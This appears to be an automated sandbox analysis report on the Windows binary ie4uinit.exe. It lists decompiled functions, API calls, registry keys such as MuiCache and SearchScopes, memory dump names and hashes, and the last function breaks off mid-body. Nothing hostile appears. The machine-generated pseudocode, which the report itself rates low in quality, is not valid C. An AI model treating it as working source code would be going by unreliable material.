0x7ff7319c4cb0
0x7ff7319c4cbd
0x7ff7319c4cc7
0x7ff7319c4cd2
0x7ff7319c4cd2
0x7ff7319c4cd9
0x7ff7319c4ce5
0x7ff7319c4cea
0x7ff7319c4cf7
0x7ff7319c4d02
0x7ff7319c4d13
0x7ff7319c4d21
0x7ff7319c4d25
0x7ff7319c4d2a
0x7ff7319c4d2d
0x7ff7319c4d33
0x7ff7319c4d37
0x7ff7319c4d3c
0x7ff7319c4d41
0x7ff7319c4d49
0x7ff7319c4d50
0x7ff7319c4d58
0x7ff7319c4d88

APIs

RegOpenKeyExW.ADVAPI32 ref: 00007FF7319C4CFA

Part of subcall function 00007FF7319C1394: _vsnwprintf.MSVCRT ref: 00007FF7319C13D4

RegCloseKey.ADVAPI32 ref: 00007FF7319C4D62

Strings

@%s, xrefs: 00007FF7319C4D07
Software\Classes\Local Settings\MuiCache, xrefs: 00007FF7319C4CF0

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CloseOpen_vsnwprintf
String ID: @%s$Software\Classes\Local Settings\MuiCache
API String ID: 2342809593-1369442998
Opcode ID: d54a0a893a90c79697a78fc8bab0873cac23001ac8187c86edf1074a7fd70ea2
Instruction ID: 6086ab866f02cb84975685c7fbb0b9648090e1649eea19acc4fd483b614b68aa
Opcode Fuzzy Hash: d54a0a893a90c79697a78fc8bab0873cac23001ac8187c86edf1074a7fd70ea2
Instruction Fuzzy Hash: E1118721F1C6C1D2EB50AB15E4443B6A360EF88788FC05531DADE47799DEACE504DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D4B80 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44
memoryCOMMON

Download Yara Rule

C-Code - Quality: 17%

			E00007FF77FF7319D4B80(void* __rax, long long __rbx, intOrPtr* __rcx, signed long long* __rdx, char _a24, char _a40, signed int _a4216, void* _a4280) {
				void* __rsi;
				void* _t14;
				signed long long _t23;
				signed long long _t24;
				void* _t27;
				void* _t33;
				intOrPtr _t39;
				void* _t40;
				void* _t41;
				void* _t45;
				void* _t46;
				void* _t47;
				signed long long* _t48;

				_a24 = __rbx;
				E00007FF77FF7319E4200(0x10a0, __rax, _t46, _t47);
				_t42 = _t41 - __rax;
				_t23 =  *0x319f4658; // 0x8be7dd1f02a
				_t24 = _t23 ^ _t41 - __rax;
				_a4216 = _t24;
				_t39 =  *__rcx;
				_t48 = __rdx;
				if (_t39 == 0) goto 0x319d4c09;
				0x319e405e();
				_a24 = 0x824;
				_t27 =  !=  ? _t39 : L"about:blank";
				E00007FF77FF7319E1BE4(_t27, _t27,  &_a40, _t39, _t40,  &_a24, _t45);
				_t33 =  ==  ? _t27 :  &_a40;
				__imp__#2();
				if (_t24 == 0) goto 0x319d4c09;
				 *_t48 = _t24;
				return E00007FF77FF7319E38D0(0, _t14, _a4216 ^ _t42);
			}

0x7ff7319d4b80
0x7ff7319d4b8e
0x7ff7319d4b93
0x7ff7319d4b96
0x7ff7319d4b9d
0x7ff7319d4ba0
0x7ff7319d4ba8
0x7ff7319d4bab
0x7ff7319d4bb6
0x7ff7319d4bc2
0x7ff7319d4bc9
0x7ff7319d4bd8
0x7ff7319d4be9
0x7ff7319d4bf5
0x7ff7319d4bf9
0x7ff7319d4c02
0x7ff7319d4c04
0x7ff7319d4c2e

APIs

StrCmpICW.SHLWAPI(?,?,?,00007FF7319D4C5D), ref: 00007FF7319D4BC2
SysAllocString.OLEAUT32 ref: 00007FF7319D4BF9

Strings

about:blank, xrefs: 00007FF7319D4BD1
about:home, xrefs: 00007FF7319D4BB8

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: AllocString
String ID: about:blank$about:home
API String ID: 2525500382-1158670746
Opcode ID: e3cf35c908b69a1a4c1a49ac493ed38e4b0f64ff1d8b174bb225fd4f1426a9cc
Instruction ID: 496915447b39a368a7728369b8395831d85d73a838b3763be9106a0b82e4c9e5
Opcode Fuzzy Hash: e3cf35c908b69a1a4c1a49ac493ed38e4b0f64ff1d8b174bb225fd4f1426a9cc
Instruction Fuzzy Hash: F5113022F0C6C1A1FB50EB15E8412E9A3A4AF84784FC58032ED8D8775DEEBCD4459720

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C5300 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E00007FF77FF7319C5300(void* __ecx, void* __edx) {
				signed int _v24;
				char _v552;
				intOrPtr _v560;
				long long _v568;
				void* __rbx;
				void* _t10;
				signed long long _t21;
				signed long long _t22;
				long long _t26;
				void* _t36;
				void* _t37;

				_t14 = __ecx;
				if (__edx != 0) goto 0x319c53b4;
				_t38 = _t37 - 0x250;
				_t21 =  *0x319f4658; // 0x8be7dd1f02a
				_t22 = _t21 ^ _t37 - 0x00000250;
				_v24 = _t22;
				if (__ecx == 0) goto 0x319c5345;
				__imp__SHDeleteValueW(_t26);
				goto 0x319c539c;
				r8d = 0x26;
				_t2 =  &_v552; // 0x22
				_t10 = E00007FF77FF7319C6680(_t26, _t2, _t36);
				if (_t10 == 0) goto 0x319c539c;
				_t3 =  &_v552; // 0x22
				if ( *((intOrPtr*)(_t3 + ((_t22 | 0xffffffff) + 1) * 2)) != 0) goto 0x319c5362;
				_v560 = _t10 + _t10;
				_t7 =  &_v552; // 0x22
				r9d = 1;
				_v568 = _t7;
				__imp__SHSetValueW();
				return E00007FF77FF7319E38D0(_t10 + _t10, _t14, _v24 ^ _t38);
			}

0x7ff7319c5300
0x7ff7319c5302
0x7ff7319c5309
0x7ff7319c5310
0x7ff7319c5317
0x7ff7319c531a
0x7ff7319c5326
0x7ff7319c533d
0x7ff7319c5343
0x7ff7319c5345
0x7ff7319c534b
0x7ff7319c5350
0x7ff7319c5357
0x7ff7319c5359
0x7ff7319c5369
0x7ff7319c5374
0x7ff7319c537f
0x7ff7319c5384
0x7ff7319c5391
0x7ff7319c5396
0x7ff7319c53b4

APIs

SHDeleteValueW.SHLWAPI ref: 00007FF7319C533D
SHSetValueW.SHLWAPI ref: 00007FF7319C5396

Strings

iexplore.exe, xrefs: 00007FF7319C5328, 00007FF7319C536D
Software\Microsoft\Windows\CurrentVersion\Explorer\RemoveAccess, xrefs: 00007FF7319C5336, 00007FF7319C5378

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Value$Delete
String ID: Software\Microsoft\Windows\CurrentVersion\Explorer\RemoveAccess$iexplore.exe
API String ID: 1738766685-729631142
Opcode ID: f019ba072745d2f2f101c59ab4a81df3ae472c3fd583abc7b516db584f8a8bba
Instruction ID: 5168954b812fe6253e0bd15b3170ece9d171fbd4bfbc2979fefae9c1bd0407f9
Opcode Fuzzy Hash: f019ba072745d2f2f101c59ab4a81df3ae472c3fd583abc7b516db584f8a8bba
Instruction Fuzzy Hash: 95114261E1CAC2A1FB20A710E4553A5A360BB94368FC05335E9EE026DCEFBCD504D724

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C4A10 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 38registryCOMMON

Download Yara Rule

APIs

RegOpenKeyW.ADVAPI32 ref: 00007FF7319C4A37
RegCreateKeyW.ADVAPI32 ref: 00007FF7319C4A51
RegSetValueExW.ADVAPI32 ref: 00007FF7319C4A9C

Strings

Implementing, xrefs: 00007FF7319C4A60

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CreateOpenValue
String ID: Implementing
API String ID: 2195001959-2263074448
Opcode ID: 317eef36383d362008ab749e517fdc5bdf2b5ebcc71cb4fdf7edef0913365292
Instruction ID: e349b1ba548eab8a766877eb91e5f550f00d24a9167365517bd4757b919b2643
Opcode Fuzzy Hash: 317eef36383d362008ab749e517fdc5bdf2b5ebcc71cb4fdf7edef0913365292
Instruction Fuzzy Hash: 51018272A2DAC195EB509B51F44025AF3A0EB88BA4F901131EA9D47B9CDFBCC194DB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319CD760 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32 ref: 00007FF7319CD796
SHSendMessageBroadcastW.SHLWAPI ref: 00007FF7319CD7CD

Strings

Software\Microsoft\Internet Explorer\SearchScopes, xrefs: 00007FF7319CD7BE
0u, xrefs: 00007FF7319CD77E

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: MessageSend$BroadcastTimeout
String ID: 0u$Software\Microsoft\Internet Explorer\SearchScopes
API String ID: 3425702700-4149236433
Opcode ID: 7d186d6492fd6aa618a3176d17e22ce627d2ec6857902fd2fcd9041473eaa155
Instruction ID: 001a71162d805a43be9062fa2473b5fd0a99fc55053cc029fab12bfc3875c1d7
Opcode Fuzzy Hash: 7d186d6492fd6aa618a3176d17e22ce627d2ec6857902fd2fcd9041473eaa155
Instruction Fuzzy Hash: 77F0F472E0D78197EB94DF20E8402AA73A0FB80359F848035C58E43B98DFBDD586CB50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C76A0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF7319C76C7
GetProcAddress.KERNEL32 ref: 00007FF7319C76DE

Strings

RtlDllShutdownInProgress, xrefs: 00007FF7319C76D4
ntdll.dll, xrefs: 00007FF7319C76C0

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: RtlDllShutdownInProgress$ntdll.dll
API String ID: 1646373207-582119455
Opcode ID: 5287d0483df1f5bfbfa107a53801fe468d64823904203b0b8f84d60e68cd571c
Instruction ID: bdab3ed1fecb86dafe058f3f2ab68b5f072d39861e383d260cac003246b1937a
Opcode Fuzzy Hash: 5287d0483df1f5bfbfa107a53801fe468d64823904203b0b8f84d60e68cd571c
Instruction Fuzzy Hash: CBF0B7A4E0EB83B5EB15AB55E844174B3A0AF58759FC45035C89C07368EEACB488E771

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C9508 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

APIs

wcschr.MSVCRT ref: 00007FF7319C951A
wcschr.MSVCRT ref: 00007FF7319C9531
wcschr.MSVCRT ref: 00007FF7319C9546

Strings

.lnk, xrefs: 00007FF7319C9513, 00007FF7319C952A

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: wcschr
String ID: .lnk
API String ID: 1497570035-24824748
Opcode ID: 478046a9081302f0480f779facef97c11e0634dbe20bdcc55dd042c2a1884940
Instruction ID: acdebfe443a9d9c79a45d78423fabaa08496a748b0f28aa8f1df62560267973f
Opcode Fuzzy Hash: 478046a9081302f0480f779facef97c11e0634dbe20bdcc55dd042c2a1884940
Instruction Fuzzy Hash: 18F01C21E1D687E5EF11AB50D844278B365AF6870DFC48834C94D0A29CEFBCB549ABB0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319C99B0 Relevance: 6.3, APIs: 5, Instructions: 68
COMMON

Download Yara Rule

C-Code - Quality: 28%

			E00007FF77FF7319C99B0(void* __eflags, long long __rbx, void* __rcx, long long __rdi, long long __rsi, void* __r8) {
				int _t20;
				void* _t31;
				long long* _t43;
				void* _t47;
				long long _t49;
				long long _t51;
				void* _t53;
				void* _t58;

				_t31 = _t53;
				 *((long long*)(_t31 + 8)) = __rbx;
				 *((long long*)(_t31 + 0x10)) = _t49;
				 *((long long*)(_t31 + 0x18)) = __rsi;
				 *((long long*)(_t31 + 0x20)) = __rdi;
				_t43 = __rcx + 0x28;
				_t47 = __rcx;
				goto 0x319c9a0a;
				_t50 =  *_t43;
				goto 0x319c99fe;
				_t51 =  *((intOrPtr*)( *_t43 + 0x30));
				E00007FF77FF7319C80A4(_t31,  *_t43, _t50, __rcx, _t51);
				GetProcessHeap();
				HeapFree(??, ??, ??);
				if (_t51 != 0) goto 0x319c99db;
				 *_t43 = _t51;
				if (_t43 + 8 != _t43 + 0x50) goto 0x319c99d6;
				if ( *((intOrPtr*)(_t47 + 0x18)) == 0) goto 0x319c9a22;
				if (CloseHandle(_t58) == 0) goto 0x319c9a66;
				if ( *((intOrPtr*)(_t47 + 0x10)) == 0) goto 0x319c9a35;
				if (CloseHandle(??) == 0) goto 0x319c9a76;
				if ( *((intOrPtr*)(_t47 + 8)) == 0) goto 0x319c9a48;
				_t20 = CloseHandle(??);
				if (_t20 == 0) goto 0x319c9a86;
				return _t20;
			}

0x7ff7319c99b0
0x7ff7319c99b3
0x7ff7319c99b7
0x7ff7319c99bb
0x7ff7319c99bf
0x7ff7319c99c9
0x7ff7319c99cd
0x7ff7319c99d4
0x7ff7319c99d6
0x7ff7319c99d9
0x7ff7319c99de
0x7ff7319c99e5
0x7ff7319c99ea
0x7ff7319c99f8
0x7ff7319c9a01
0x7ff7319c9a03
0x7ff7319c9a0d
0x7ff7319c9a16
0x7ff7319c9a20
0x7ff7319c9a29
0x7ff7319c9a33
0x7ff7319c9a3c
0x7ff7319c9a3e
0x7ff7319c9a46
0x7ff7319c9a65

APIs

CloseHandle.KERNEL32 ref: 00007FF7319C9A18
CloseHandle.KERNEL32 ref: 00007FF7319C9A2B
CloseHandle.KERNEL32 ref: 00007FF7319C9A3E

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: fcfd7331e435d7abd631c32b58dedaa9009deac4d8fa1b42bf3055aa938fa55f
Instruction ID: 99165fd4deec3393abafedc05959d1ec3b973ed00e64bf7bbd5ce8408dee0619
Opcode Fuzzy Hash: fcfd7331e435d7abd631c32b58dedaa9009deac4d8fa1b42bf3055aa938fa55f
Instruction Fuzzy Hash: 1E219121F09A8296EB24AF56D440179A364EF84F94F984435DBCE03B5DCF7CE451EB20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D8914 Relevance: 6.2, APIs: 4, Instructions: 204
COMMON

Download Yara Rule

C-Code - Quality: 26%

			E00007FF77FF7319D8914(void* __esi, void* __rax, long long __rbx, intOrPtr* __rcx, long long __rdx) {
				void* __rsi;
				void* __rbp;
				void* _t61;
				signed int _t76;
				long long _t97;
				signed long long _t119;
				intOrPtr _t132;
				long long _t133;
				long long _t167;
				void* _t169;
				intOrPtr* _t170;
				void* _t172;
				void* _t175;
				signed long long _t176;
				void* _t195;
				void* _t196;
				void* _t197;
				short* _t198;
				void* _t201;
				void* _t206;
				void* _t208;
				long long _t209;

				_t133 = __rbx;
				 *((long long*)(_t175 + 0x18)) = __rbx;
				_t173 = _t175 - 0x11d0;
				E00007FF77FF7319E4200(0x12d0, __rax, _t195, _t196);
				_t176 = _t175 - __rax;
				_t119 =  *0x319f4658; // 0x8be7dd1f02a
				 *(_t175 - 0x11d0 + 0x11c0) = _t119 ^ _t176;
				_t209 = __rdx;
				_t170 = __rcx;
				_t97 = __rdx;
				if (_t97 == 0) goto 0x319d8c0a;
				 *((intOrPtr*)(__rcx + 0x20)) = 0;
				if (_t97 != 0) goto 0x319d8967;
				_t61 = E00007FF77FF7319DA6F8(__rbx, __rcx - 1, __rdx, __rcx, __rcx + 0x2c8);
				if (_t61 < 0) goto 0x319d8c0a;
				 *((long long*)(_t176 + 0x40)) = _t209;
				 *((intOrPtr*)(_t176 + 0x38)) = 1;
				r9d = 0;
				 *((long long*)(_t176 + 0x30)) = _t176 + 0x50;
				 *((long long*)(_t176 + 0x28)) = _t176 + 0x58;
				 *((long long*)(_t176 + 0x20)) = _t167;
				_t16 = _t133 - 7; // 0x1
				r8d = _t16;
				 *((short*)(__rcx + 0x2c0)) = 8;
				 *((long long*)(_t176 + 0x58)) = _t167;
				 *((intOrPtr*)(_t176 + 0x50)) = 0;
				__imp__#651(_t201, _t197, _t167, _t169, _t172);
				if (_t61 < 0) goto 0x319d89eb;
				 *((long long*)(__rcx + 0x7b0)) =  *((intOrPtr*)(_t176 + 0x58));
				goto 0x319d89fe;
				 *((long long*)(__rcx + 0x7b0)) = _t167;
				0x319e4113();
				r14d = 0;
				_t198 = __rcx + 0x40;
				if (r14d == 8) goto 0x319d8b86;
				if (r14d == 0xb) goto 0x319d8b75;
				if (r14d == 0) goto 0x319d8b65;
				if (r14d == 0xd) goto 0x319d8b65;
				if (E00007FF77FF7319D7EF8(r14d, _t176 + 0x58) < 0) goto 0x319d8b86;
				_t134 =  *((intOrPtr*)(_t176 + 0x58));
				 *((long long*)(_t176 + 0x50)) = _t167;
				if (E00007FF77FF7319C6970(_t62, _t209, _t176 + 0x50) >= 0) goto 0x319d8a80;
				if (E00007FF77FF7319C6970(_t63, _t209, _t176 + 0x50) >= 0) goto 0x319d8a80;
				goto 0x319d8aae;
				if (E00007FF77FF7319DA6F8( *((intOrPtr*)(_t176 + 0x58)), r14d + r14d * 4 << 4,  *((intOrPtr*)(_t176 + 0x50)), _t170, _t170 + 0x30 + (r14d + r14d * 4 << 4)) < 0) goto 0x319d8aae;
				 *((short*)(_t198 - 0x18)) = 8;
				 *((long long*)(_t176 + 0x50)) = _t167;
				0x319e4113();
				if (E00007FF77FF7319C6970(8, _t209, _t176 + 0x50) < 0) goto 0x319d8b01;
				if (E00007FF77FF7319DA6F8( *((intOrPtr*)(_t176 + 0x58)),  *((intOrPtr*)(_t176 + 0x58)),  *((intOrPtr*)(_t176 + 0x50)), _t170, _t170 + 0x48 + (r14d + r14d * 4 << 4)) < 0) goto 0x319d8b01;
				 *_t198 = 8;
				 *((long long*)(_t176 + 0x50)) = _t167;
				0x319e4113();
				if (E00007FF77FF7319C6970(8, _t209, _t176 + 0x50) < 0) goto 0x319d8b54;
				if (E00007FF77FF7319DA6F8(_t134, r14d + r14d * 4 << 4,  *((intOrPtr*)(_t176 + 0x50)), _t170, _t170 + 0x60 + (r14d + r14d * 4 << 4)) < 0) goto 0x319d8b59;
				 *((short*)(_t198 + 0x18)) = 8;
				goto 0x319d8b59;
				0x319e4113();
				goto 0x319d8b86;
				r8d = r14d;
				E00007FF77FF7319D8708(0, _t134, _t170, _t209, _t175 - 0x11d0, _t208, _t206);
				goto 0x319d8b86;
				r8d = 0xb;
				E00007FF77FF7319D8810(r14d, __esi, _t134, _t170, _t209, _t173);
				r14d = r14d + 1;
				if (r14d - 0x18 < 0) goto 0x319d8a05;
				r9d = 0x104;
				if ( *0x319e7038() < 0) goto 0x319d8c0a;
				r9d = 0x824;
				_t132 =  *((intOrPtr*)( *_t170 + 0x48));
				if ( *0x319e7038() < 0) goto 0x319d8c0a;
				_t76 = E00007FF77FF7319E118C(_t75, _t173 + 0x170);
				_t55 = _t132 - 1; // -1
				if (_t55 - 1 <= 0) goto 0x319d8bfa;
				if (_t76 != 0xb) goto 0x319d8bff;
				asm("sbb eax, eax");
				return E00007FF77FF7319E38D0( !_t76 & 0x80004005, _t55,  *(_t173 + 0x11c0) ^ _t176);
			}

0x7ff7319d8914
0x7ff7319d8914
0x7ff7319d8924
0x7ff7319d8931
0x7ff7319d8936
0x7ff7319d8939
0x7ff7319d8943
0x7ff7319d894c
0x7ff7319d894f
0x7ff7319d8957
0x7ff7319d895a
0x7ff7319d8967
0x7ff7319d8971
0x7ff7319d897a
0x7ff7319d8981
0x7ff7319d8993
0x7ff7319d899d
0x7ff7319d89a5
0x7ff7319d89a8
0x7ff7319d89b2
0x7ff7319d89ba
0x7ff7319d89bf
0x7ff7319d89bf
0x7ff7319d89c3
0x7ff7319d89ca
0x7ff7319d89cf
0x7ff7319d89d3
0x7ff7319d89db
0x7ff7319d89e2
0x7ff7319d89e9
0x7ff7319d89f2
0x7ff7319d89f9
0x7ff7319d89fe
0x7ff7319d8a01
0x7ff7319d8a08
0x7ff7319d8a12
0x7ff7319d8a1b
0x7ff7319d8a25
0x7ff7319d8a3a
0x7ff7319d8a40
0x7ff7319d8a4d
0x7ff7319d8a5e
0x7ff7319d8a77
0x7ff7319d8a7e
0x7ff7319d8aa1
0x7ff7319d8aa8
0x7ff7319d8ab1
0x7ff7319d8ab6
0x7ff7319d8ad7
0x7ff7319d8af5
0x7ff7319d8afc
0x7ff7319d8b04
0x7ff7319d8b09
0x7ff7319d8b25
0x7ff7319d8b4a
0x7ff7319d8b4c
0x7ff7319d8b52
0x7ff7319d8b5e
0x7ff7319d8b63
0x7ff7319d8b65
0x7ff7319d8b6e
0x7ff7319d8b73
0x7ff7319d8b75
0x7ff7319d8b81
0x7ff7319d8b86
0x7ff7319d8b91
0x7ff7319d8b9f
0x7ff7319d8bb9
0x7ff7319d8bc5
0x7ff7319d8bd3
0x7ff7319d8bdf
0x7ff7319d8be8
0x7ff7319d8bed
0x7ff7319d8bf3
0x7ff7319d8bf8
0x7ff7319d8c01
0x7ff7319d8c33

APIs

#651.IERTUTIL(00000001,?,?,?,00000001,00000001,?,00007FF7319D45A8), ref: 00007FF7319D89D3
CoTaskMemFree.OLE32(?,00000001,00000001,?,00007FF7319D45A8), ref: 00007FF7319D8AB6
CoTaskMemFree.OLE32(?,00000001,00000001,?,00007FF7319D45A8), ref: 00007FF7319D8B09

Part of subcall function 00007FF7319DA6F8: SysFreeString.OLEAUT32 ref: 00007FF7319DA743

CoTaskMemFree.OLE32(?,00000001,00000001,?,00007FF7319D45A8), ref: 00007FF7319D8B5E

Memory Dump Source

Source File: 00000009.00000002.325779833.00007FF7319C1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7319C0000, based on PE: true

Associated: 00000009.00000002.325768067.00007FF7319C0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325815225.00007FF7319E5000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325831661.00007FF7319F4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F6000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000009.00000002.325836429.00007FF7319F9000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_7ff7319c0000_ie4uinit.jbxd

Similarity

API ID: Free$Task$#651String
String ID:
API String ID: 2586053401-0
Opcode ID: 75bd6e6943d83bf5a8ebfd2af5cb8d0721f28f9732940ef182c506b54b3ce6d9
Instruction ID: 5ac6ec25f245c90d0418cba633c39f00c2ac8d50eebd7d96a6b019243cb7c7e7
Opcode Fuzzy Hash: 75bd6e6943d83bf5a8ebfd2af5cb8d0721f28f9732940ef182c506b54b3ce6d9
Instruction Fuzzy Hash: E7816172E086C2A2FB10AB51E4442FAE760FB857C8F804035DE4D57B6ADFBDE1459760

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7319D716C Relevance: 6.1, APIs: 4, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 31%

			E00007FF77FF7319D716C(intOrPtr __ebx, void* __ecx, void* __edx, void* __esi, void* __ebp, void* __eflags, void* __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, void* __r8, void* __r9, long long __r12, intOrPtr _a40, intOrPtr _a48, long long _a56, intOrPtr _a64) {
				void* _v24;
				char _v40;
				char _v48;
				char _v56;
				long long _v72;
				void* __rbp;
				void* _t37;
				void* _t63;
				intOrPtr _t80;
				void* _t99;
				void* _t102;
				void* _t114;
				void* _t118;
				intOrPtr* _t119;
				void* _t121;

				_t77 = __rbx;
				_t114 = _t102;
				 *((long long*)(_t114 + 8)) = __rsi;
				 *((long long*)(_t114 + 0x10)) = __rdi;
				 *((long long*)(_t114 + 0x18)) = __r12;
				r12d = 0;
				_v56 = __r12;
				 *((long long*)(_t114 - 0x48)) =  &_v56;
				if (E00007FF77FF7319D60C0(__ecx, __esi, __eflags, __rcx, __rdx, __r8, _a40) < 0) goto 0x319d72c2;
				r14d = r12d;
				_v40 = __r12;
				__imp__#7(_t118, _t99);
				if (_v56 == __r12) goto 0x319d71da;
				_t80 = _v56;
